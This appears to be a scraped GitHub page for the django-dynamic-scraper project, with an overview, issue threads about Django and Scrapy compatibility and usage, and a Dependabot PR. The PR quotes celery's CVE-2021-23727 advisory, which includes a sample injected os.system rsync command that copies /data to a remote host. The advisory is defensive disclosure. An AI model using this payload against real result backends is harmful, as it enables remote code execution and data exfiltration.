Creating Scrapy scrapers via the Django admin interface

Overview

django-dynamic-scraper

Django Dynamic Scraper (DDS) is an app for Django that builds on top of the scraping framework Scrapy and lets you create and manage Scrapy spiders via the Django admin interface. It was originally developed for the German web TV program site http://fernsehsuche.de.

Documentation

Read more about DDS in the ReadTheDocs documentation:

Getting Help/Updates

There is a mailing list on Google Groups, feel free to ask questions or make suggestions:

Infos about new releases and updates on Twitter:

Comments
  • Allow the user to customize the scraper

    Allow the user to customize the scraper

    I am a newbie to web crawling. I am going to build a Django web app in which users fill out a form (keywords, time, etc.) and submit it. Then the scraper will begin to work and crawl the data according to the user's requirements from a specific website (set by me). After that the data will be passed to another model to do some clustering work. How can I do that?

    opened by ghost 11
  • Added FOLLOW pagination type.

    Added FOLLOW pagination type.

    This only follows pages (dynamically) after crawling all of the links in the base page. If you have any interest in this PR, I can flesh out the implementation and docs.

    someday 
    opened by scott-coates 10
  • Add explicit on_delete argument to be compatible for Django 2.0.

    Add explicit on_delete argument to be compatible for Django 2.0.

    Django 2 requires explicit on_delete argument as per the following page.

    https://docs.djangoproject.com/en/2.0/releases/2.0/

    "The on_delete argument for ForeignKey and OneToOneField is now required in models and migrations. Consider squashing migrations so that you have fewer of them to update."

    This fix will suppress the Django 2.0 warnings in Django 1.x and fix the compatibility issue for Django 2.
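
    For reference, a minimal sketch of what the change looks like on a Django model (hypothetical model names loosely modeled on the open_news example, not DDS's actual code):

    from django.db import models


    class NewsWebsite(models.Model):
        name = models.CharField(max_length=200)
        url = models.URLField()


    class Article(models.Model):
        title = models.CharField(max_length=200)
        # Django 2.0 makes on_delete mandatory for ForeignKey and OneToOneField;
        # passing it explicitly also silences the deprecation warnings on 1.x.
        news_website = models.ForeignKey(
            NewsWebsite,
            on_delete=models.CASCADE,  # delete articles when their website is deleted
        )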

    opened by ryokamiya 9
  • can't run python manage.py celeryd

    can't run python manage.py celeryd

    Trying to run $ python manage.py celeryd -l info -B --settings=example_project.settings gives me this error:

      File "manage.py", line 10, in
    TypeError: invalid arguments

    My system info is as follows: Python 2.7, Celery 3.1.19, Django-celery 3.1.16. Django-celery is installed and can be seen in the example_project Django admin page, but I get this issue when running the example command. Any advice would be appreciated. Thanks.

    opened by ratha-pkh 8
  • New Django1.7 branch

    New Django1.7 branch

    Here is a small contribution to adapt the package to Django 1.7 and Scrapy 0.24. It has not been heavily tested yet and probably needs additional feedback from the community, but it is a start for those who want to work in a more up-to-date environment.

    PS: note that this is my first PR, so it might not follow the general conventions.

    opened by jice-lavocat 7
  • Installation Failure in Pillow req when Brew's JPEG package isn't installed

    Installation Failure in Pillow req when Brew's JPEG package isn't installed

    The Pillow requirement installed by DDS has a dependency on Homebrew's jpeg package and throws the following error when DDS is installed either directly from GitHub or via pip on OS X 10.13.4 with Python 3.6.4.

    ValueError: jpeg is required unless explicitly disabled using --disable-jpeg, aborting

    Pillow's OS X installation instructions detail how to add these dependencies: brew install libtiff libjpeg webp little-cms2

    opened by tom-price 5
  • Allow storing extra XPATHs / add another pagination option

    Allow storing extra XPATHs / add another pagination option

    Currently only 5 XPATH types are stored — STANDARD, STANDARD_UPDATE, DETAIL, BASE and IMAGE. It would be good to have another section called EXTRA.

    I quite often need to access an XPath value that is not necessarily mapped to a model field. In my case, I need an additional XPath for finding the next pagination link and have had to resort to using one of the other fields as a hack.

    opened by mridang 5
  • Question: IN/ACTIVE status on NewsWebsite?

    Question: IN/ACTIVE status on NewsWebsite?

    Hello,

    Quick newbie question: I have a use case with 3 NewsWebsite entries that all scrape the same domain URL, with only the keyword differentiating them, like the following:

    NewsWebsite 1 url is "http://www.somewebsite.com/?q=keyword1"
    NewsWebsite 2 url is "http://www.somewebsite.com/?q=keyword2"
    etc.

    This way I can filter by keyword in the Article admin and only need to create one scraper for all of them. However, I notice the IN/ACTIVE status is on the scraper, so setting the scraper to INACTIVE will stop scraping for all NewsWebsite entries when I actually only need to disable one keyword. Is there a way to accomplish this in DDS?

    Cheers
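
    One possible workaround (a hedged sketch with a hypothetical active field, not a built-in DDS feature) is to put the on/off switch on the NewsWebsite model itself and only launch spiders for entries that are still enabled:

    from django.db import models


    class NewsWebsite(models.Model):
        name = models.CharField(max_length=200)
        url = models.URLField()
        # Hypothetical per-website (i.e. per-keyword) switch, independent of
        # the shared scraper's own ACTIVE/INACTIVE status.
        active = models.BooleanField(default=True)


    def websites_to_scrape():
        """Return only the websites whose keyword scraping is currently enabled."""
        return NewsWebsite.objects.filter(active=True)

    The periodic task or cron job that schedules the spider runs would then iterate over websites_to_scrape() and skip the disabled keywords, while the scraper itself stays ACTIVE.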

    opened by senoadiw 4
  • pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    pre_url produces ERROR Unsupported URL scheme 'doublehttp' when rerunning scrapy after saving articles to DB

    Hi,

    I'm stuck on this problem. I configured an example similar to the startup project, providing a detail page with 'pre_url': 'http://www.website.com'. I want it to scrape the listing every hour (using crontab) and add any new articles.

    When I run the command for the first time (Article table empty), it populates the items correctly. However, if I run the command again once new articles have been added (with scrapy crawl article_spider -a id=2 -a do_action=yes), with the Article table populated, it does scrape the page but doesn't add the new articles:

    2016-08-27 10:33:45 [scrapy] ERROR: Error downloading <GET doublehttp://www.website.com/politique/318534.html>
    Traceback (most recent call last):
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/internet/defer.py", line 1126, in _inlineCallbacks
        result = result.throwExceptionIntoGenerator(g)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/twisted/python/failure.py", line 389, in throwExceptionIntoGenerator
        return g.throw(self.type, self.value, self.tb)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/middleware.py", line 43, in process_request
        defer.returnValue((yield download_func(request=request,spider=spider)))
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/utils/defer.py", line 45, in mustbe_deferred
        result = f(*args, **kw)
      File "/home/akram/eb-virt/local/lib/python2.7/site-packages/scrapy/core/downloader/handlers/__init__.py", line 64, in download_request
        (scheme, self._notconfigured[scheme]))
    NotSupported: Unsupported URL scheme 'doublehttp': no handler available for that scheme
    2016-08-27 10:33:45 [scrapy] INFO: Closing spider (finished)
    

    I searched for this "doublehttp" scheme error but couldn't find anything useful.

    Versions I have:

    Twisted==16.3.2 Scrapy==1.1.2 scrapy-djangoitem==1.1.1 django-dynamic-scraper==0.11.2

    URL in DB (for an article):

    http://www.website.com/politique/318756.html

    Scraped URL without pre_url:

    /politique/318756.html

    Any hint?

    Thank you for your consideration and for this great project.
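
    For reference, the symptom suggests pre_url is being applied to a detail URL that is already absolute. A defensive sketch (a hypothetical helper, not DDS's actual pre_url processor) that only prepends when the scraped value is relative:

    # Python 2.7: use `from urlparse import urljoin` instead.
    from urllib.parse import urljoin


    def absolutize(scraped_url, pre_url='http://www.website.com'):
        """Prepend pre_url only when the scraped value is not already absolute."""
        if scraped_url.startswith(('http://', 'https://')):
            return scraped_url
        return urljoin(pre_url, scraped_url)


    # absolutize('/politique/318756.html')
    #   -> 'http://www.website.com/politique/318756.html'
    # absolutize('http://www.website.com/politique/318756.html')
    #   -> unchanged, so no 'doublehttp'-style mangling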

    opened by Akramz 4
  • loaddata of example got errors

    loaddata of example got errors

    I configured the example. When I run python manage.py loaddata open_news/open_news.json I get the error below:

    $ python manage.py loaddata open_news/open_news.json
    Problem installing fixture 'open_news/open_news.json': Traceback (most recent call last):
      File "/usr/lib64/python2.7/site-packages/django/core/management/commands/loaddata.py", line 196, in handle
        obj.save(using=using)
      File "/usr/lib64/python2.7/site-packages/django/core/serializers/base.py", line 165, in save
        models.Model.save_base(self.object, using=using, raw=True)
      File "/usr/lib64/python2.7/site-packages/django/db/models/base.py", line 551, in save_base
        result = manager._insert([self], fields=fields, return_id=update_pk, using=using, raw=raw)
      File "/usr/lib64/python2.7/site-packages/django/db/models/manager.py", line 203, in _insert
        return insert_query(self.model, objs, fields, **kwargs)
      File "/usr/lib64/python2.7/site-packages/django/db/models/query.py", line 1576, in insert_query
        return query.get_compiler(using=using).execute_sql(return_id)
      File "/usr/lib64/python2.7/site-packages/django/db/models/sql/compiler.py", line 910, in execute_sql
        cursor.execute(sql, params)
      File "/usr/lib64/python2.7/site-packages/django/db/backends/util.py", line 40, in execute
        return self.cursor.execute(sql, params)
      File "/usr/lib64/python2.7/site-packages/django/db/backends/sqlite3/base.py", line 337, in execute
        return Database.Cursor.execute(self, query, params)
    IntegrityError: Could not load contenttypes.ContentType(pk=25): columns app_label, model are not unique

    What's wrong with it?
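
    A commonly suggested workaround for this kind of contenttypes clash (a hedged sketch, not an official fix from the DDS docs) is to clear the auto-created ContentType rows before loading a fixture that ships its own:

    # Run inside `python manage.py shell` before loaddata.
    from django.contrib.contenttypes.models import ContentType

    # syncdb/migrate auto-creates ContentType rows; the fixture contains its own,
    # and the two collide on the unique (app_label, model) pair. Clearing the
    # table lets loaddata insert the fixture's rows cleanly (note this also
    # cascades to objects referencing those content types, e.g. permissions).
    ContentType.objects.all().delete()

    Alternatively, the fixture can be re-dumped with natural keys (dumpdata --natural on old Django versions, --natural-foreign on newer ones) so it no longer hard-codes ContentType primary keys.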

    opened by gorf 4
  • DDS unusable with django >= 1.10

    DDS unusable with django >= 1.10

    Django 1.11.1: we are unable to add a request page type (see screenshot).

    Django 1.9.7: we are able to add a request page type (see screenshot).

    Looks like a problem with the registration of the inline form for the request page type.

    DDS version in both cases - 0.12

    opened by tigrus 3
  • Bump celery from 3.1.25 to 5.2.2

    Bump celery from 3.1.25 to 5.2.2

    Bumps celery from 3.1.25 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.
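
      A simplified Python illustration of the kind of guard the patch adds when rebuilding the stored exception (not celery's actual code):

      import importlib


      def rebuild_exception(exc_module, exc_type, exc_message):
          """Recreate a stored exception, refusing anything that is not an exception class."""
          cls = getattr(importlib.import_module(exc_module), exc_type)
          if not (isinstance(cls, type) and issubclass(cls, BaseException)):
              # Without this check, {"exc_module": "os", "exc_type": "system", ...}
              # would execute os.system(exc_message) the moment the "exception"
              # is instantiated on the process querying the result.
              raise TypeError('%s.%s is not an exception type' % (exc_module, exc_type))
          return cls(exc_message)


      # rebuild_exception('builtins', 'ValueError', 'boom')  -> ValueError('boom')
      # rebuild_exception('os', 'system', 'rsync ...')       -> raises TypeError instead of running rsync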

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies 
    opened by dependabot[bot] 0
  • New Scrapy Support List

    New Scrapy Support List

    I will use this thread to report my tests with new Scrapy releases that DDS doesn't support at the moment. Keep in mind that I use a modified version of DDS 0.13.3, but I think if they work for me, they'll work with the original DDS 0.13.3 too.

    Scrapy 1.6.0 works fine, Scrapy 1.8.0 works fine

    opened by bezkos 0
  • How can I save crawled data in multi model?

    How can I save crawled data in multi model?

    Hi, thanks for DDS. I want to crawl items from a website and keep a history of some fields (like price). I made a separate model, connected it to the main model, and in a pipeline I insert the price into the price model when the crawled item is saved to the DB, and that works. How can I add a new price to the price model only when the price has changed?
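
    A hedged sketch of that comparison step (hypothetical Product/PriceHistory models and a custom item pipeline, not DDS's built-in pipeline): only insert a new history row when the freshly scraped price differs from the latest stored one.

    # models.py (hypothetical)
    from django.db import models


    class Product(models.Model):
        name = models.CharField(max_length=200)
        price = models.DecimalField(max_digits=10, decimal_places=2)


    class PriceHistory(models.Model):
        product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='prices')
        price = models.DecimalField(max_digits=10, decimal_places=2)
        recorded_at = models.DateTimeField(auto_now_add=True)


    # pipelines.py (hypothetical pipeline, run after the item has been validated/saved)
    from decimal import Decimal


    class PriceHistoryPipeline(object):
        def process_item(self, item, spider):
            product = Product.objects.filter(name=item['name']).first()
            if product is not None:
                new_price = Decimal(str(item['price']))
                latest = product.prices.order_by('-recorded_at').first()
                # Only record a history row when the price actually changed.
                if latest is None or latest.price != new_price:
                    PriceHistory.objects.create(product=product, price=new_price)
            return item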

    opened by relaxdevvv 0
  • Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    Django Dynamic Scraper: Celery Tasks not executed in Scrapyd

    I started using the django dynamic scraper for my personal project.

    I created my scrapers as I should and everything works when I run scrapy crawl in a terminal. Now I want to use django-celery to schedule scraping. I followed everything in the tutorial (created a periodic task, ran celeryd, ran scrapyd, deployed the scrapy project, changed the scraper status to ACTIVE in the UI).

    The very first time it runs, I can see that a process is spawned on the scrapyd server. It runs once and never runs again, even when I define a new periodic task.

    Celery keeps sending tasks, but all I see in scrapyd is the following log:

    2020-11-19T12:18:36+0200 [twisted.python.log#info] "127.0.0.1" - - [19/Nov/2020:10:18:36 +0000] "GET /listjobs.json?project=default HTTP/1.1" 200 93 "-" "Python-urllib/2.7"

    I tried to deactivate dynamic scheduling as explained in the documentation but it still does not work. My tasks are spawned only once and I can't work that way.

    If someone has already run into this issue, I would highly appreciate the help.

    opened by benjaminelkrieff 0
  • Dynamically change the url of the "Website" component

    Dynamically change the url of the "Website" component

    Hi everyone.

    I am working on a project in which I want multiple URLs to be scraped by the same scraper. For example: let's say I want to scrape social media profiles. I want to scrape the name and the profile picture, so I just define one scraper for this use case.

    Let's say I have the profile URLs of 10,000 people. How can I scrape all of these URLs without defining 10,000 websites in the Django admin?

    Currently, what I see is that I can define one website with one hardcoded URL, link it to a scraper, and call the scrapy command-line tool with the website ID. But it doesn't give me any option to change the URL dynamically.

    I can't believe that there is no such option and that's why I am asking the community if there is such an option or if I can define this specific mechanism at the model level.

    Thank you
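
    One model-level approach (a hedged sketch with hypothetical names, not a documented DDS feature) is to create the website entries programmatically instead of by hand in the admin, and launch the shared spider once per entry:

    import subprocess

    # Hypothetical Django model playing the role of the "Website" component,
    # one row per profile URL, all linked to the single shared scraper.
    from myapp.models import SocialProfile

    profile_urls = [
        'https://socialnetwork.example/alice',
        'https://socialnetwork.example/bob',
        # ... the remaining URLs, loaded from wherever they are stored
    ]

    for url in profile_urls:
        profile, _ = SocialProfile.objects.get_or_create(url=url)
        # Run from inside the Scrapy project so the spider and Django settings resolve.
        subprocess.call([
            'scrapy', 'crawl', 'profile_spider',
            '-a', 'id=%s' % profile.pk,
            '-a', 'do_action=yes',
        ])

    This still creates one row per URL, but it avoids clicking 10,000 entries into the admin and keeps a single scraper definition.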

    opened by benjaminelkrieff 0
Releases: v0.13.2
Dude is a very simple framework for writing web scrapers using Python decorators

Dude is a very simple framework for writing web scrapers using Python decorators. The design, inspired by Flask, aims to make it easy to build a web scraper in just a few lines of code. Dude has an easy-to-learn syntax.

Ronie Martinez 326 Dec 15, 2022
Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Django and Vue.js

Gerapy Distributed Crawler Management Framework Based on Scrapy, Scrapyd, Scrapyd-Client, Scrapyd-API, Django and Vue.js. Documentation

Gerapy 2.9k Jan 3, 2023
Visual scraping for Scrapy

Portia Portia is a tool that allows you to visually scrape websites without any programming knowledge required. With Portia you can annotate a web page.

Scrapinghub 8.7k Jan 5, 2023
Scrapy, a fast high-level web crawling & scraping framework for Python.

Scrapy Overview Scrapy is a fast high-level web crawling and web scraping framework, used to crawl websites and extract structured data from their pages.

Scrapy project 45.5k Jan 7, 2023
An experiment to deploy a serverless infrastructure for a scrapy project.

Serverless Scrapy project This project aims to evaluate the feasibility of an architecture based on serverless technology for a web crawler using Scrapy.

José Ferraz Neto 5 Jul 8, 2022
a high-performance, lightweight and human friendly serving engine for scrapy

a high-performance, lightweight and human friendly serving engine for scrapy

Speakol Ads 30 Mar 1, 2022
Snowflake database loading utility with Scrapy integration

Snowflake Stage Exporter Snowflake database loading utility with Scrapy integration. Meant for streaming ingestion of JSON serializable objects into Snowflake.

Oleg T. 0 Dec 6, 2021
download NCERT books using scrapy

download_ncert_books download NCERT books using scrapy Downloading Books: You can either use the spider by cloning this repo and following the instructions.

null 1 Dec 2, 2022
Scraping news from Ucsal portal with Scrapy.

NewsScraping This is a project for scraping the latest news, from 2021, from the Ucsal university portal http://noosfero.ucsal.br/institucional

Crissiano Pires 0 Sep 30, 2021
a Scrapy spider that utilizes Postgres as a DB, Squid as a proxy server, Redis for de-duplication and Splash to render JavaScript. All in a microservices architecture utilizing Docker and Docker Compose

This is George's Scraping Project To get started, cd into the theZoo directory and run chmod +x script.sh, then ./script.sh. This will spin up a Postgres container.

George Reyes 7 Nov 27, 2022
Fundamentus scrapy

Fundamentus_scrapy Downloads information that the other Fundamentus scrapers do not collect. To start (python main.py), a file will be created named ...

Guilherme Silva Uchoa 1 Oct 24, 2021
Crawler do site Fundamentus.com com o uso do framework scrapy, tanto da aba detalhada como a de resumo.

Crawler for the Fundamentus.com site using the Scrapy framework, covering both the detailed tab and the summary tab. (All information)

Guilherme Silva Uchoa 3 Oct 4, 2022
Scrapy-based cyber security news finder

Cyber-Security-News-Scraper Scrapy-based cyber security news finder. Goal: to keep up to date on the constant barrage of information within the field of cyber security.

null 2 Nov 1, 2021
Searching info from Google using Python Scrapy

Python-Search-Engine-Scrapy || Python crawler / indexing: use a crawler to fetch information from Google / Searching info from Google using Python Scrapy / use a Python crawler to fetch weather information, as well as city information and data.

HONGVVENG 1 Jan 6, 2022
Scrapy uses Request and Response objects for crawling web sites.

Requests and Responses: Scrapy uses Request and Response objects for crawling web sites. Typically, Request objects are generated in the spiders and pass across the system until they reach the Downloader.

Md Rashidul Islam 1 Nov 3, 2021
This Spider/Bot is developed using Python and based on Scrapy Framework to Fetch some items information from Amazon

Hello, this project contains an Amazon web bot. I've developed this bot for fetching some item information from Amazon. It is built with the Scrapy framework in Python.

Khaled Tofailieh 4 Feb 13, 2022
Amazon scraper using scrapy, a python framework for crawling websites.

#Amazon-web-scraper This is a Python program which uses the Scrapy framework to crawl all of a product's pages and scrape product data.

Akash Das 1 Dec 26, 2021
Bigdata - This Scrapy project uses Redis and Kafka to create a distributed on demand scraping cluster

Scrapy Cluster This Scrapy project uses Redis and Kafka to create a distributed on demand scraping cluster.

Hanh Pham Van 0 Jan 6, 2022
This is a web scraper, using Python framework Scrapy, built to extract data from the Deals of the Day section on Mercado Livre website.

Deals of the Day This is a web scraper, using the Python framework Scrapy, built to extract data such as price and product name from the Deals of the Day section on the Mercado Livre website.

David Souza 1 Jan 12, 2022